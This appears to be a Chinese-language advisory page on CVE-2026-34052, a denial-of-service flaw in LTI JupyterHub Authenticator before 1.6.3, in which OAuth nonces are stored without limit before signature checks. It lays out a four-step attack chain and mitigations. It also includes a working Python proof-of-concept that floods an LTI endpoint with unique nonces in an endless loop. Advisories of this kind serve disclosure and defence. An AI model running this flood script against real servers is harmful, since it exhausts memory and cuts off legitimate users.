CVE-2026-34052 CVSS 5.9 中危

CVE-2026-34052 LTI JupyterHub认证器DoS漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34052

漏洞类型

拒绝服务

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

LTI JupyterHub Authenticator

漏洞概述

LTI JupyterHub Authenticator 1.6.3之前的版本存在安全漏洞。LTI 1.1验证器在类级别字典中无限制存储OAuth nonce，且在签名验证前添加。攻击者利用有效的消费者密钥发送带有唯一nonce的重复请求，可耗尽服务器内存导致拒绝服务。

技术细节

该漏洞位于LTI JupyterHub Authenticator的LTI 1.1验证器模块中，核心问题是OAuth nonce管理不当。在受影响版本中，验证器将接收到的OAuth nonce存储在一个类级别的字典中，且缺乏清理机制或大小限制，导致该字典随着请求处理无限制增长。更为严重的是，代码逻辑在签名验证步骤之前就将nonce添加到了字典中。这意味着攻击者无需构造有效的签名，仅需知道一个有效的消费者密钥，即可向目标服务器发送大量包含随机、唯一nonce的请求。服务器在处理这些请求时会不断分配内存存储nonce，最终因内存耗尽而崩溃或无法响应，造成拒绝服务。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标JupyterHub实例并获取一个有效的OAuth消费者密钥。

STEP 2

2. 发起攻击

攻击者编写脚本，向LTI端点发送大量包含随机生成且唯一的OAuth nonce的请求。

STEP 3

3. 资源耗尽

服务器在验证签名前将nonce存入字典，导致内存占用持续上升，直至耗尽。

STEP 4

4. 拒绝服务

服务器因内存不足崩溃或停止响应，合法用户无法访问服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import uuid

target_url = "https://target-jupyterhub-instance/lti/launch"
consumer_key = "VALID_CONSUMER_KEY_HERE"

print("Starting DoS attack simulation by exhausting memory with nonces...")

try:
    while True:
        # Generate a unique nonce for each request
        unique_nonce = str(uuid.uuid4())
        
        payload = {
            "oauth_consumer_key": consumer_key,
            "oauth_nonce": unique_nonce,
            "oauth_timestamp": str(int(__import__('time').time())),
            # Signature is invalid but nonce is stored before validation
        }
        
        # Send request
        response = requests.post(target_url, data=payload)
        
        print(f"Sent request with nonce: {unique_nonce}, Status: {response.status_code}")
        
except KeyboardInterrupt:
    print("Attack stopped by user.")

影响范围

LTI JupyterHub Authenticator < 1.6.3

防御指南

临时缓解措施

建议立即将组件升级至修复版本。如果暂时无法升级，应在网络边界（如WAF或反向代理）实施速率限制策略，拦截来自单一IP的异常高频请求，并密切监控服务器内存资源，一旦发现异常增长及时重启服务。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表